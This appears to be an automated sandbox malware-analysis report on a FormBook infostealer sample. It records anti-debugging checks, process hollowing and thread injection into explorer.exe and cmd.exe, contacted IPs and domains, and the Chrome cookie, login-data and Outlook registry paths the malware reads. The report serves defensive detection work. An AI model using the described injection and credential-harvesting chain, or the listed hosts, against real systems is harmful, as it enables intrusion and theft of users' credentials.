Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B1B8F mov eax, dword ptr fs:[00000030h] 3_2_009B1B8F
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A5D380 mov ecx, dword ptr fs:[00000030h] 3_2_00A5D380
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A6138A mov eax, dword ptr fs:[00000030h] 3_2_00A6138A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A6131B mov eax, dword ptr fs:[00000030h] 3_2_00A6131B
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009AF358 mov eax, dword ptr fs:[00000030h] 3_2_009AF358
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009ADB40 mov eax, dword ptr fs:[00000030h] 3_2_009ADB40
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009D3B7A mov eax, dword ptr fs:[00000030h] 3_2_009D3B7A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009D3B7A mov eax, dword ptr fs:[00000030h] 3_2_009D3B7A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009ADB60 mov ecx, dword ptr fs:[00000030h] 3_2_009ADB60
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A78B58 mov eax, dword ptr fs:[00000030h] 3_2_00A78B58
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A26CF0 mov eax, dword ptr fs:[00000030h] 3_2_00A26CF0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A26CF0 mov eax, dword ptr fs:[00000030h] 3_2_00A26CF0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A26CF0 mov eax, dword ptr fs:[00000030h] 3_2_00A26CF0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A614FB mov eax, dword ptr fs:[00000030h] 3_2_00A614FB
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A78CD6 mov eax, dword ptr fs:[00000030h] 3_2_00A78CD6
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h] 3_2_00A61C06
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h] 3_2_00A61C06
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h] 3_2_00A61C06
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h] 3_2_00A61C06
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h] 3_2_00A61C06
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h] 3_2_00A61C06
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h] 3_2_00A61C06
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h] 3_2_00A61C06
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h] 3_2_00A61C06
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h] 3_2_00A61C06
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h] 3_2_00A61C06
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h] 3_2_00A61C06
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h] 3_2_00A61C06
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h] 3_2_00A61C06
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A26C0A mov eax, dword ptr fs:[00000030h] 3_2_00A26C0A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A26C0A mov eax, dword ptr fs:[00000030h] 3_2_00A26C0A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A26C0A mov eax, dword ptr fs:[00000030h] 3_2_00A26C0A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A26C0A mov eax, dword ptr fs:[00000030h] 3_2_00A26C0A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A7740D mov eax, dword ptr fs:[00000030h] 3_2_00A7740D
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A7740D mov eax, dword ptr fs:[00000030h] 3_2_00A7740D
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A7740D mov eax, dword ptr fs:[00000030h] 3_2_00A7740D
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009DBC2C mov eax, dword ptr fs:[00000030h] 3_2_009DBC2C
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009C746D mov eax, dword ptr fs:[00000030h] 3_2_009C746D
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A3C450 mov eax, dword ptr fs:[00000030h] 3_2_00A3C450
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A3C450 mov eax, dword ptr fs:[00000030h] 3_2_00A3C450
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009DFD9B mov eax, dword ptr fs:[00000030h] 3_2_009DFD9B
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009DFD9B mov eax, dword ptr fs:[00000030h] 3_2_009DFD9B
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A2D8A mov eax, dword ptr fs:[00000030h] 3_2_009A2D8A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A2D8A mov eax, dword ptr fs:[00000030h] 3_2_009A2D8A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A2D8A mov eax, dword ptr fs:[00000030h] 3_2_009A2D8A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A2D8A mov eax, dword ptr fs:[00000030h] 3_2_009A2D8A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A2D8A mov eax, dword ptr fs:[00000030h] 3_2_009A2D8A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009D35A1 mov eax, dword ptr fs:[00000030h] 3_2_009D35A1
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A58DF1 mov eax, dword ptr fs:[00000030h] 3_2_00A58DF1
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A78D34 mov eax, dword ptr fs:[00000030h] 3_2_00A78D34
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A2A537 mov eax, dword ptr fs:[00000030h] 3_2_00A2A537
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009D4D3B mov eax, dword ptr fs:[00000030h] 3_2_009D4D3B
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009D4D3B mov eax, dword ptr fs:[00000030h] 3_2_009D4D3B
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009D4D3B mov eax, dword ptr fs:[00000030h] 3_2_009D4D3B
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009AAD30 mov eax, dword ptr fs:[00000030h] 3_2_009AAD30
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h] 3_2_009B3D34
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h] 3_2_009B3D34
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h] 3_2_009B3D34
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h] 3_2_009B3D34
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h] 3_2_009B3D34
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h] 3_2_009B3D34
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h] 3_2_009B3D34
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h] 3_2_009B3D34
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h] 3_2_009B3D34
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h] 3_2_009B3D34
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h] 3_2_009B3D34
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h] 3_2_009B3D34
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h] 3_2_009B3D34
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009C7D50 mov eax, dword ptr fs:[00000030h] 3_2_009C7D50
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E3D43 mov eax, dword ptr fs:[00000030h] 3_2_009E3D43
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A23540 mov eax, dword ptr fs:[00000030h] 3_2_00A23540
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009CC577 mov eax, dword ptr fs:[00000030h] 3_2_009CC577
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009CC577 mov eax, dword ptr fs:[00000030h] 3_2_009CC577
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A70EA5 mov eax, dword ptr fs:[00000030h] 3_2_00A70EA5
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A70EA5 mov eax, dword ptr fs:[00000030h] 3_2_00A70EA5
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A70EA5 mov eax, dword ptr fs:[00000030h] 3_2_00A70EA5
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A246A7 mov eax, dword ptr fs:[00000030h] 3_2_00A246A7
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A3FE87 mov eax, dword ptr fs:[00000030h] 3_2_00A3FE87
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009D36CC mov eax, dword ptr fs:[00000030h] 3_2_009D36CC
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E8EC7 mov eax, dword ptr fs:[00000030h] 3_2_009E8EC7
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A5FEC0 mov eax, dword ptr fs:[00000030h] 3_2_00A5FEC0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A78ED6 mov eax, dword ptr fs:[00000030h] 3_2_00A78ED6
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B76E2 mov eax, dword ptr fs:[00000030h] 3_2_009B76E2
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009D16E0 mov ecx, dword ptr fs:[00000030h] 3_2_009D16E0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A5FE3F mov eax, dword ptr fs:[00000030h] 3_2_00A5FE3F
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009AC600 mov eax, dword ptr fs:[00000030h] 3_2_009AC600
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009AC600 mov eax, dword ptr fs:[00000030h] 3_2_009AC600
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009AC600 mov eax, dword ptr fs:[00000030h] 3_2_009AC600
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009AE620 mov eax, dword ptr fs:[00000030h] 3_2_009AE620
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B7E41 mov eax, dword ptr fs:[00000030h] 3_2_009B7E41
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B7E41 mov eax, dword ptr fs:[00000030h] 3_2_009B7E41
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B7E41 mov eax, dword ptr fs:[00000030h] 3_2_009B7E41
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B7E41 mov eax, dword ptr fs:[00000030h] 3_2_009B7E41
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B7E41 mov eax, dword ptr fs:[00000030h] 3_2_009B7E41
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B7E41 mov eax, dword ptr fs:[00000030h] 3_2_009B7E41
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009CAE73 mov eax, dword ptr fs:[00000030h] 3_2_009CAE73
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009CAE73 mov eax, dword ptr fs:[00000030h] 3_2_009CAE73
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009CAE73 mov eax, dword ptr fs:[00000030h] 3_2_009CAE73
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009CAE73 mov eax, dword ptr fs:[00000030h] 3_2_009CAE73
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009CAE73 mov eax, dword ptr fs:[00000030h] 3_2_009CAE73
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B766D mov eax, dword ptr fs:[00000030h] 3_2_009B766D
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A27794 mov eax, dword ptr fs:[00000030h] 3_2_00A27794
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A27794 mov eax, dword ptr fs:[00000030h] 3_2_00A27794
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A27794 mov eax, dword ptr fs:[00000030h] 3_2_00A27794
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A7070D mov eax, dword ptr fs:[00000030h] 3_2_00A7070D
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A7070D mov eax, dword ptr fs:[00000030h] 3_2_00A7070D
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009DE730 mov eax, dword ptr fs:[00000030h] 3_2_009DE730
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A3FF10 mov eax, dword ptr fs:[00000030h] 3_2_00A3FF10
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A3FF10 mov eax, dword ptr fs:[00000030h] 3_2_00A3FF10
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A4F2E mov eax, dword ptr fs:[00000030h] 3_2_009A4F2E
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A4F2E mov eax, dword ptr fs:[00000030h] 3_2_009A4F2E
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A78F6A mov eax, dword ptr fs:[00000030h] 3_2_00A78F6A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009BEF40 mov eax, dword ptr fs:[00000030h] 3_2_009BEF40
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009BFF60 mov eax, dword ptr fs:[00000030h] 3_2_009BFF60
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_0040CF93 LdrLoadDll, 3_2_0040CF93
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 1_2_004018B6 SetUnhandledExceptionFilter, 1_2_004018B6
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 1_2_00401754 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00401754
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 1_2_0040632B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0040632B
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 1_2_00401BB3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_00401BB3

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 85.187.128.34 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 91.195.240.94 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 45.33.30.197 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.un-object.com
Source: C:\Windows\explorer.exe Domain query: www.energyservicestation.com
Source: C:\Windows\explorer.exe Network Connect: 78.141.192.145 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.white-hat.uk
Source: C:\Windows\explorer.exe Domain query: www.thewildphotographer.co.uk
Source: C:\Windows\explorer.exe Domain query: www.shapshit.xyz
Source: C:\Windows\explorer.exe Network Connect: 81.17.18.198 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 192.185.17.12 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.thedivinerudraksha.com
Source: C:\Windows\explorer.exe Network Connect: 199.192.30.147 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.bitservicesltd.com
Source: C:\Windows\explorer.exe Domain query: www.younrock.com
Source: C:\Windows\explorer.exe Domain query: www.gritslab.com
Source: C:\Windows\explorer.exe Network Connect: 161.97.163.8 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.222ambking.org
Source: C:\Windows\explorer.exe Domain query: www.fclaimrewardccpointq.shop
Source: C:\Windows\explorer.exe Network Connect: 94.176.104.86 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 213.145.228.111 80 Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Section unmapped: C:\Windows\SysWOW64\cmd.exe base address: D90000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Thread register set: target process: 3528 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Thread register set: target process: 3528 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Process created: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Jump to behavior
Source: explorer.exe, 00000004.00000000.319269612.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.567677513.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: EProgram Managerzx
Source: explorer.exe, 00000004.00000000.327263504.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.574282998.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.446841530.000000000834F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.319269612.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.567677513.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.318203390.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.567226844.00000000009C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progmanath
Source: explorer.exe, 00000004.00000000.319269612.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.567677513.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 1_2_004019C5 cpuid 1_2_004019C5
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 1_2_0040163B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 1_2_0040163B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403640

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\cmd.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 830750 Sample: SecuriteInfo.com.Trojan.Gar... Startdate: 20/03/2023 Architecture: WINDOWS Score: 100 35 Snort IDS alert for network traffic 2->35 37 Malicious sample detected (through community Yara rule) 2->37 39 Antivirus detection for URL or domain 2->39 41 3 other signatures 2->41 9 SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe 19 2->9         started        process3 file4 27 C:\Users\user\AppData\Local\...\vfpbkeeo.exe, PE32 9->27 dropped 12 vfpbkeeo.exe 1 9->12         started        process5 signatures6 55 Multi AV Scanner detection for dropped file 12->55 57 Detected unpacking (changes PE section rights) 12->57 59 Machine Learning detection for dropped file 12->59 61 2 other signatures 12->61 15 vfpbkeeo.exe 12->15         started        18 conhost.exe 12->18         started        process7 signatures8 63 Modifies the context of a thread in another process (thread injection) 15->63 65 Maps a DLL or memory area into another process 15->65 67 Sample uses process hollowing technique 15->67 69 Queues an APC in another process (thread injection) 15->69 20 explorer.exe 1 15->20 injected process9 dnsIp10 29 un-object.com 192.185.17.12, 49713, 49714, 80 UNIFIEDLAYER-AS-1US United States 20->29 31 www.222ambking.org 91.195.240.94, 49701, 49702, 80 SEDO-ASDE Germany 20->31 33 13 other IPs or domains 20->33 43 System process connects to network (likely due to code injection or exploit) 20->43 45 Performs DNS queries to domains with low reputation 20->45 24 cmd.exe 13 20->24         started        signatures11 process12 signatures13 47 Tries to steal Mail credentials (via file / registry access) 24->47 49 Tries to harvest and steal browser information (history, passwords, etc) 24->49 51 Modifies the context of a thread in another process (thread injection) 24->51 53 Maps a DLL or memory area into another process 24->53
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
85.187.128.34
